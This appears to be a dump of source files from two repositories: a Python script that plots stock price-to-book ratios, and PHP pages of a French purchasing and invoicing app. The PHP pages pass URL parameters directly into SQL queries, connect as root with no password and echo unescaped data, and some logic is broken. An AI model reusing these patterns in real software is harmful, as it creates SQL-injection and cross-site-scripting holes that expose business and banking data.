7d757ba5883158b79c6c71bb8e4bedb899be3dc8
|
226620336f3bbae43d3470b21044d48c8f57df91
|
refs/heads/main
|
<file_sep>import requests
import json
from matplotlib import pyplot as plt
url = "https://apidojo-yahoo-finance-v1.p.rapidapi.com/market/v2/get-quotes"
querystring = {"region":"US","symbols":"AMD,IBM,AAPL,NKE,TSLA,FB,AMZN,NFLX"}
headers = {
'x-rapidapi-key': "<KEY>",
'x-rapidapi-host': "apidojo-yahoo-finance-v1.p.rapidapi.com"
}
response = requests.request("GET", url, headers=headers, params=querystring)
data = response.json()
tickerAndPriceToBook = {}
for company in data['quoteResponse']['result']:
symbol = company['symbol']
priceToBook = company['priceToBook']
tickerAndPriceToBook[symbol] = priceToBook
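# Sort the tickers by ascending price-to-book ratio.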
sortedDict = sorted(tickerAndPriceToBook.items(), key=lambda item: item[1])
xvals = []
yvals = []
for obj in sortedDict:
xvals.append(obj[0])
yvals.append(obj[1])
fig, ax = plt.subplots()
ax.set(xlabel='Ticker', ylabel = 'Price-To-Book Value')
ax.set_title('Sorted Price-To-Book Values of Public Companies')
ax.scatter(xvals,yvals)
plt.show()<file_sep><h1 align='center'>finance-matplotlib-python</h1>
****
## 🌎 Overview
This application graphs the Price-To-Book value of several publicly traded companies.
The data is sorted in order and displayed as a scatter plot.
## 👍 How To Run
The app can be run locally for testing and further development.
```bash
# clone the repo and cd into it
git clone https://github.com/spencerkrebs/CoronaVirusTrackerJava.git
cd CoronaVirusTrackerJava
# install python's requests HTTP library
pip3 install requests
# install matplotlib
python3 -m ensurepip --default-pip
python3 -m pip install -U matplotlib
```
## 📦 Tech Stack
* Python
* Matplotlib
* Yahoo Finance API
|
ff6fada3e162a40c36dc51afe34b52bc824ecc7f
|
[
"Markdown",
"Python"
] | 2
|
Python
|
spencerkrebs/finance-matplotlib-python
|
3f9f920578eddc2e68f397adee9290a59876a447
|
be3503aa5304609b7034999dc84e49e73b413476
|
refs/heads/master
|
<file_sep>GCO
===
Gestion Commerciale Online
<file_sep><?php
mysql_connect("localhost", "root", "");
mysql_select_db("gestion");
$idcmdfour = $_GET['idcmdfour'];
// Import the quote items
$sql_cmd_four = mysql_query("SELECT * FROM `cmd_four` WHERE idcmdfour =".$idcmdfour);
$donnee_cmd_four = mysql_fetch_array($sql_cmd_four);
$idreceptionfour = $donnee_cmd_four['idcmdfour'];
$idcmdfour = $donnee_cmd_four['idcmdfour'];
$idfournisseur = $donnee_cmd_four['idfournisseur'];
$date_reception_four = date("d-m-Y");
// Copy the twelve article/quantity columns into $art1..$art12 / $qte1..$qte12.
for ($i = 1; $i <= 12; $i++) {
    ${"art$i"} = $donnee_cmd_four["art$i"];
    ${"qte$i"} = $donnee_cmd_four["qte$i"];
}
$sql_reception_four = "INSERT INTO `reception_four`(`idreceptionfour`, `idcmdfour`, `idfournisseur`, `date_reception_four`, `etat_reception_four`, `art1`, `qte1`, `art2`, `qte2`, `art3`, `qte3`, `art4`, `qte4`, `art5`, `qte5`, `art6`, `qte6`, `art7`, `qte7`, `art8`, `qte8`, `art9`, `qte9`, `art10`, `qte10`, `art11`, `qte11`, `art12`, `qte12`)
VALUES ('','$idcmdfour','$idfournisseur','$date_reception_four','1','$art1','$qte1','$art2','$qte2','$art3','$qte3','$art4','$qte4','$art5','$qte5','$art6','$qte6','$art7','$qte7',
'$art8','$qte8','$art9','$qte9','$art10','$qte10','$art11','$qte11','$art12','$qte12')";
mysql_query($sql_reception_four);
// Update the stock level for each article line of the received order.
for ($i = 1; $i <= 12; $i++) {
    $art = ${"art$i"};
    $qte = ${"qte$i"};
    mysql_query("UPDATE `article` SET `stock_reel`=$qte WHERE desc_court ='$art'");
}
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">ACHAT</a> </li>
<li><a href="index.devis.php">COMMANDE</a></li>
<li><a href="nouv.client.php" class="active"><span class="semi-bold">Transfere en Reception</span></a></li>
</ul>
<div class="page-title"> <i class="icon-custom-left"></i>
<h3>ACHAT - <span class="semi-bold">Transfere en Reception</span></h3>
</div>
<?php
if($result_reception_four == true){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-success fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> SUCCES!</h4>
<p> Le Bon de récéption Numéro RECFOUR000<?php echo $idcmdfour; ?> à été transférer avec succès. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
<?php
if($result_reception_four == false){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-error fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> ERROR!</h4>
<p> Une Erreur de type <b><?php echo $error; ?></b> s'est produit. Vérifier votre Code. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
</div>
</div>
</div>
<!-- END CONTAINER -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep><?php
mysql_connect("localhost", "root", "");
mysql_select_db("gestion");
//Import the quote to transfer into a purchase order
//NOTE: assumes the quote id is passed as ?iddevisfour=... by the quote sheet, like the other transfer pages
$iddevisfour = $_GET['iddevisfour'];
$sql_devis_export = mysql_query("SELECT * FROM `devis_four` WHERE iddevisfour=".$iddevisfour);
$donnee_devis_export = mysql_fetch_array($sql_devis_export);
$idfournisseur = $donnee_devis_export['idfournisseur'];
$date_cmd_four = date("d-m-Y");
// Copy the 12 article / quantity / unit-price line slots from the quote
for ($i = 1; $i <= 12; $i++) {
    ${"art".$i} = $donnee_devis_export['art'.$i];
    ${"qte".$i} = $donnee_devis_export['qte'.$i];
    ${"pvht".$i} = $donnee_devis_export['pvht'.$i];
}
$port = $donnee_devis_export['port']; $remise = $donnee_devis_export['remise']; $eco_part = $donnee_devis_export['eco-part'];
$ptht_cmd_four = $donnee_devis_export['ptht_devis_four']; $taxe_cmd_four = $donnee_devis_export['taxedevisfour']; $ptttc_cmd_four = $donnee_devis_export['ptttc_devis_four'];
$sql_cmd_four = "INSERT INTO `cmd_four`(`idcmdfour`, `idfournisseur`, `date_cmd_four`, `etat_cmd_four`, `date_livraison_cmd_four`, `art1`, `qte1`, `art2`, `qte2`, `art3`, `qte3`, `art4`, `qte4`, `art5`, `qte5`, `art6`, `qte6`, `art7`, `qte7`, `art8`, `qte8`, `art9`, `qte9`, `art10`, `qte10`, `art11`, `qte11`, `art12`, `qte12`, `pvht1`, `pvht2`, `pvht3`, `pvht4`, `pvht5`, `pvht6`, `pvht7`, `pvht8`, `pvht9`, `pvht10`, `pvht11`, `pvht12`, `port`, `remise`, `eco-part`, `ptht_cmd_four`, `taxe_cmd_four`, `ptttc_cmd_four`)
VALUES ('','$idfournisseur','$date_cmd_four','1','','$art1','$qte1','$art2','$qte2','$art3','$qte3','$art4','$qte4','$art5','$qte5','$art6','$qte6','$art7','$qte7',
'$art8','$qte8','$art9','$qte9','$art10','$qte10','$art11','$qte11','$art12','$qte12','$pvht1','$pvht2','$pvht3','$pvht4','$pvht5','$pvht6','$pvht7','$pvht8','$pvht9','$pvht10','$pvht11',
'$pvht12','$port','$remise','$eco_part','$ptht_cmd_four','$taxe_cmd_four','$ptttc_cmd_four')";
$result_cmd_four = mysql_query($sql_cmd_four);
$error = mysql_error();
$idcmdfour = mysql_insert_id();
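// Assumption: flag the source quote as transferred (state 9 is rendered as "Transféré en Commande" in the quote list)
mysql_query("UPDATE `devis_four` SET `etat_devis_four`=9 WHERE iddevisfour=".$iddevisfour);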
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">ACHAT</a> </li>
<li><a href="index.devis.php">DEVIS</a></li>
<li><a href="nouv.client.php" class="active"><span class="semi-bold">Transfere en Commande</span></a></li>
</ul>
<div class="page-title"> <i class="icon-custom-left"></i>
<h3>ACHAT - <span class="semi-bold">Transfere en commande</span></h3>
</div>
<?php
if($result_cmd_four == true){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-success fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> SUCCES!</h4>
<p> Le Commande Numéro CMDFOUR000<?php echo $iddevisfour; ?> à été transférer avec succès. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
<?php
if($result_cmd_four == false){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-error fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> ERROR!</h4>
<p> Une Erreur de type <b><?php echo $error; ?></b> s'est produit. Vérifier votre Code. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
</div>
</div>
</div>
<!-- END CONTAINER -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep><?php
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
$idclient = $_GET['idclient'];
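// Load the client's current record so every field of the wizard can be pre-filled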
$sql_client = mysql_query("SELECT * FROM client WHERE idclient =".$idclient);
$donnee_client = mysql_fetch_array($sql_client);
?>
<script type="text/javascript">
$("#date").mask("99/99/9999");
</script>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">Donnée</a> </li>
<li><a href="index.php">Client</a></li>
<li><a href="nouv.client.php" class="active"><span class="semi-bold">Modifier Client</span></a></li>
</ul>
<div class="page-title"> <i class="icon-custom-left"></i>
<h3>CLIENT - <span class="semi-bold">Modifier Client</span></h3>
</div>
<div class="row">
<div class="col-md-12">
<div class="grid simple transparent">
<div class="grid-title">
<h4>Modifier <span class="semi-bold">Client</span></h4>
<div class="tools"> <a href="javascript:;" class="collapse"></a> <a href="#grid-config" data-toggle="modal" class="config"></a> <a href="javascript:;" class="reload"></a> <a href="javascript:;" class="remove"></a> </div>
</div>
<div class="grid-body ">
<div class="row">
<form id="commentForm" action="valid.modif.client.php" method="post">
<div id="rootwizard" class="col-md-12">
<div class="form-wizard-steps">
<ul class="wizard-steps">
<li class="" data-target="#step1"> <a href="#tab1" data-toggle="tab"> <span class="step">1</span> <span class="title">Information de Contact</span> </a> </li>
<li data-target="#step2" class=""> <a href="#tab2" data-toggle="tab"> <span class="step">2</span> <span class="title">Information Société</span> </a> </li>
<li data-target="#step3" class=""> <a href="#tab3" data-toggle="tab"> <span class="step">3</span> <span class="title">Information de Paiement</span> </a> </li>
</ul>
<div class="clearfix"></div>
</div>
<div class="tab-content transparent">
<div class="tab-pane" id="tab1"> <br>
<h4 class="semi-bold">Etape 1 - <span class="light">Information de Contact</span></h4>
<br>
<div class="row form-row">
<div class="col-md-12">
<input type="text" placeholder="<?php echo $donnee_client['idclient']; ?>" class="form-control no-boarder " name="idclient" id="txtFirstName" value= "<?php echo $donnee_client['idclient']; ?>" hidden>
</div>
<div class="col-md-12">
<select name="civilite" class="form-control no-boarder " placeholder="Civilité" value=="<?php echo $donnee_client['civilite']; ?>">
<option value="1">Monsieur</option>
<option value="2">Madame</option>
<option value="3">Mademoiselle</option>
<option value="4">Entreprise</option>
<option value="5">SARL</option>
<option value="6">SA</option>
<option value="7">EURL</option>
<option value="8">SAS</option>
</select>
</div>
</div>
<div class="row form-row">
<div class="col-md-6">
<input type="text" placeholder="Nom" class="form-control no-boarder " name="nom" id="txtFirstName" value = "<?php echo $donnee_client['nom']; ?>">
</div>
<div class="col-md-6">
<input type="text" placeholder="Prénom" class="form-control no-boarder " name="prenom" id="txtLastName" value = "<?php echo $donnee_client['prenom']; ?>">
</div>
</div>
<div class="row form-row">
<div class="col-md-12">
<textarea name="adresse1" class="form-control no-boarder " placeholder="Adresse du client"><?php echo $donnee_client['adresse1']; ?></textarea>
</div>
</div>
<div class="row form-row">
<div class="col-md-12">
<textarea name="adresse2" class="form-control no-boarder " placeholder="Complément d'Adresse du client"><?php echo $donnee_client['adresse2']; ?></textarea>
</div>
</div>
<div class="row form-row">
<div class="col-md-2">
<input type="text" placeholder="Code Postal" class="form-control no-boarder " name="cp" id="txtLastName" value="<?php echo $donnee_client['cp']; ?>">
</div>
<div class="col-md-10">
<input type="text" placeholder="Ville" class="form-control no-boarder " name="ville" id="txtLastName" value="<?php echo $donnee_client['ville']; ?>">
</div>
</div>
<div class="row form-row">
<div class="col-md-4">
<input type="text" placeholder="Tel Fixe" class="form-control no-boarder " name="tel" id="txtLastName" value="<?php echo $donnee_client['tel']; ?>">
</div>
<div class="col-md-4">
<input type="text" placeholder="Fax" class="form-control no-boarder " name="fax" id="txtLastName" value="<?php echo $donnee_client['fax']; ?>">
</div>
<div class="col-md-4">
<input type="text" placeholder="Tel Portable" class="form-control no-boarder " name="port" id="txtLastName" value="<?php echo $donnee_client['port']; ?>">
</div>
</div>
<div class="row form-row">
<div class="col-md-12">
<input type="text" placeholder="Adresse Mail" class="form-control no-boarder " name="mail" id="txtLastName" value="<?php echo $donnee_client['mail']; ?>">
</div>
</div>
<div class="row form-row">
<label>Responsable client</label>
<div class="col-md-12">
<select name="iduser" class="form-control no-boarder " >
<option value="1" <?php if ($donnee_client['iduser']=='1'){ echo "selected";} ?>>Corentin</option>
<option value="2" <?php if ($donnee_client['iduser']=='2'){ echo "selected";} ?>>Maxime</option>
<option value="3" <?php if ($donnee_client['iduser']=='3'){ echo "selected";} ?>>Alexis</option>
<option value="4" <?php if ($donnee_client['iduser']=='4'){ echo "selected";} ?>>Ludivine</option>
</select>
</div>
</div>
</div>
<div class="tab-pane" id="tab2"> <br>
<h4 class="semi-bold">Etape 2 - <span class="light">Information Société</span></h4>
<br>
<div class="row form-row">
<div class="col-md-12">
<input type="text" placeholder="Raison Social" class="form-control no-boarder " name="raison_social" id="txtCountry" value="<?php echo $donnee_client['raison_social']; ?>">
</div>
</div>
<div class="row form-row">
<div class="col-md-12">
<input type="text" placeholder="Numéro de Siret" class="form-control no-boarder " name="num_siret" id="txtCountry" value="<?php echo $donnee_client['num_siret']; ?>">
</div>
</div>
<div class="row form-row">
<div class="col-md-12">
<input type="text" placeholder="Numéro de TVA" class="form-control no-boarder " name="num_tva" id="txtCountry" value="<?php echo $donnee_client['num_tva']; ?>">
</div>
</div>
<div class="row form-row">
<div class="col-md-12">
<label>Encours Disponible</label>
<input type="text" placeholder="Encours disponible" class="form-control no-boarder " name="encour" id="txtCountry" value="<?php echo $donnee_client['encour']; ?>">
</div>
</div>
</div>
<div class="tab-pane" id="tab3"> <br>
<h4 class="semi-bold">Etape 3 - <span class="light">Information de Paiement</span></h4>
<br>
<div class="row form-row">
<div class="col-md-12">
<label>Mode De paiement par default</label>
<select name="mode_paiement_default" class="form-control no-boarder " placeholder="mode_paiement_default" value="<?php echo $donnee_client['mode_paiement_default']; ?>">
<option value="1">CB Comptant</option>
<option value="2">CB Différé</option>
<option value="3">Chèque Comptant</option>
<option value="4">Chèque Différé</option>
<option value="5">Virement</option>
<option value="6">Prélèvement</option>
<option value="7">Paypal</option>
</select>
</div>
</div>
<h5>RIB</h5>
<div class="row form-row">
<div class="col-md-2">
<input type="text" placeholder="Banque" class="form-control no-boarder " name="code_banque" id="txtCountry" value="<?php echo $donnee_client['code_banque']; ?>">
</div>
<div class="col-md-2">
<input type="text" placeholder="Guichet" class="form-control no-boarder " name="code_guichet" id="txtCountry" value="<?php echo $donnee_client['code_guichet']; ?>">
</div>
<div class="col-md-6">
<input type="text" placeholder="Numéro de Compte" class="form-control no-boarder " name="code_cpt" id="txtCountry" value="<?php echo $donnee_client['code_cpt']; ?>">
</div>
<div class="col-md-2">
<input type="text" placeholder="Clé rib" class="form-control no-boarder " name="cle_rib" id="txtCountry" value="<?php echo $donnee_client['cle_rib']; ?>">
</div>
</div>
<div class="row form-row">
<div class="col-md-8">
<input type="text" placeholder="IBAN" class="form-control no-boarder " name="iban" id="txtCountry"value="<?php echo $donnee_client['iban']; ?>">
</div>
<div class="col-md-4">
<input type="text" placeholder="BIC" class="form-control no-boarder " name="bic" id="txtCountry" value="<?php echo $donnee_client['bic']; ?>">
</div>
</div>
<div class="row form-row">
<div class="col-md-8">
<label>Paypal</label>
<input type="text" placeholder="Adresse Utiliser pour Paypal" class="form-control no-boarder " name="mail_paypal" id="txtCountry" value="<?php echo $donnee_client['mail_paypal']; ?>">
</div>
</div>
<button class="btn btn-primary btn-cons" type="submit">Valider</button>
<button class="btn btn-danger btn-cons" type="reset">Reset</button>
</div>
<ul class=" wizard wizard-actions">
<li class="previous first" style="display:none;"><a href="javascript:;" class="btn"> First </a></li>
<li class="previous"><a href="javascript:;" class="btn"> Previous </a></li>
<li class="next last" style="display:none;"><a href="javascript:;" class="btn btn-primary"> Last </a></li>
<li class="next"><a href="javascript:;" class="btn btn-primary"> Next </a></li>
</ul>
</div>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- END PAGE -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap-datepicker/js/bootstrap-datepicker.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap-select2/select2.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/boostrap-form-wizard/js/jquery.bootstrap.wizard.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-validation/js/jquery.validate.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-inputmask/jquery.inputmask.min.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<script src="<?php echo $rootsite; ?>assets/js/form_validations.js" type="text/javascript"></script>
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
<!-- END JAVASCRIPTS -->
</body>
</html><file_sep><?php
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
$idfactfour = $_GET['idfactfour'];
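// Issuing company for the header, the supplier invoice with its supplier, and its recorded payments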
$sql_societe = mysql_query("SELECT * FROM societe WHERE idsociete = 1");
$sql_fact_four = mysql_query("SELECT * FROM fournisseur, fact_four WHERE fact_four.idfournisseur = fournisseur.idfournisseur AND idfactfour=".$idfactfour);
$sql_reglement_fact_four = mysql_query("SELECT * FROM reg_fact_four WHERE idfactfour=".$idfactfour);
$donnee_societe = mysql_fetch_array($sql_societe);
$donnee_fact_four = mysql_fetch_array($sql_fact_four);
$donnee_reg_fact_four = mysql_fetch_array($sql_reglement_fact_four);
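// Amount already paid: sum of the up to three recorded instalments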
$reg_fact = $donnee_reg_fact_four['montant_reg1']+$donnee_reg_fact_four['montant_reg2']+$donnee_reg_fact_four['montant_reg3'];
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<div class="row">
<div class="col-md-11">
<div class="grid simple">
<div class="grid-body no-border invoice-body"> <br>
<div class="pull-left"> <img src="<?php echo $rootsite; ?>assets/img/invoicelogo.png" data-src="<?php echo $rootsite; ?>assets/img/invoicelogo.png" data-src-retina="<?php echo $rootsite; ?>assets/img/invoicelogo2x.png" width="222" height="31" class="invoice-logo" alt="">
<address>
<strong><?php echo $donnee_societe['raison_social']; ?></strong><br>
<?php echo $donnee_societe['adresse1']; ?><br>
<?php echo $donnee_societe['cp']; ?> <?php echo $donnee_societe['ville']; ?><br>
<abbr title="Phone">Téléphone:</abbr> <?php echo $donnee_societe['tel']; ?><br>
<abbr title="Mail">Mail:</abbr><?php echo $donnee_societe['mail']; ?>
</address>
</div>
<div class="pull-right">
<h2>FACTURE</h2><b>
<h6>Fournisseur</h6>
</div>
<div class="clearfix"></div>
<br>
<br>
<br>
<div class="row">
<div class="col-md-9">
<h1>
</div>
<div class="col-md-3"> <br>
<div>
<div class="pull-left"> FACTURE N° : </div>
<div class="pull-right"> FACTFOUR000<?php echo $donnee_fact_four['idfactfour']; ?> </div>
<div class="clearfix"></div>
</div>
<div>
<div class="pull-left"> DATE DE LA FACTURE : </div>
<div class="pull-right"> <?php echo $donnee_fact_four['date_fact_four']; ?> </div>
<div class="clearfix"></div>
</div>
<br>
<div class="well well-small yellow">
<div class="pull-left"> DATE DE D'ECHEANCE: </div>
<div class="pull-right"> <?php echo $donnee_fact_four['date_echeance_fact_four']; ?> </div>
<div class="clearfix"></div>
</div>
<b>
<div class="well well-small green">
<div class="pull-left"> MONTANT TOTAL DE LA FACTURE: </div>
<div class="pull-right"> <?php echo $donnee_fact_four['ptttc_fact_four']; ?> EUR </div>
<div class="clearfix"></div>
</div>
</div>
</div>
<table class="table">
<thead>
<tr>
<th class="text-left">DESCRIPTION</th>
<th style="width:30px">QTE</th>
<th style="width:140px" class="text-right">Prix Unitaire HT</th>
<th style="width:90px" class="text-right">Total HT</th>
</tr>
</thead>
<tbody>
<?php
if($donnee_fact_four['art1'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_fact_four['art1']; ?></td>
<td><?php echo $donnee_fact_four['qte1']; ?></td>
<td class="text-right"><?php echo $donnee_fact_four['pvht1']; ?> €</td>
<td class="text-right"><?php echo $donnee_fact_four['pvht1'] * $donnee_fact_four['qte1']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_fact_four['art2'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_fact_four['art2']; ?></td>
<td><?php echo $donnee_fact_four['qte2']; ?></td>
<td class="text-right"><?php echo $donnee_fact_four['pvht2']; ?> €</td>
<td class="text-right"><?php echo $donnee_fact_four['pvht2'] * $donnee_fact_four['qte2']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_fact_four['art3'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_fact_four['art3']; ?></td>
<td><?php echo $donnee_fact_four['qte3']; ?></td>
<td class="text-right"><?php echo $donnee_fact_four['pvht3']; ?> €</td>
<td class="text-right"><?php echo $donnee_fact_four['pvht3'] * $donnee_fact_four['qte3']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_fact_four['art4'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_fact_four['art4']; ?></td>
<td><?php echo $donnee_fact_four['qte4']; ?></td>
<td class="text-right"><?php echo $donnee_fact_four['pvht4']; ?> €</td>
<td class="text-right"><?php echo $donnee_fact_four['pvht4'] * $donnee_fact_four['qte4']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_fact_four['art5'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_fact_four['art5']; ?></td>
<td><?php echo $donnee_fact_four['qte5']; ?></td>
<td class="text-right"><?php echo $donnee_fact_four['pvht5']; ?> €</td>
<td class="text-right"><?php echo $donnee_fact_four['pvht5'] * $donnee_fact_four['qte5']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_fact_four['art6'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_fact_four['art6']; ?></td>
<td><?php echo $donnee_fact_four['qte6']; ?></td>
<td class="text-right"><?php echo $donnee_fact_four['pvht6']; ?> €</td>
<td class="text-right"><?php echo $donnee_fact_four['pvht6'] * $donnee_fact_four['qte6']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_fact_four['art7'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_fact_four['art7']; ?></td>
<td><?php echo $donnee_fact_four['qte7']; ?></td>
<td class="text-right"><?php echo $donnee_fact_four['pvht7']; ?> €</td>
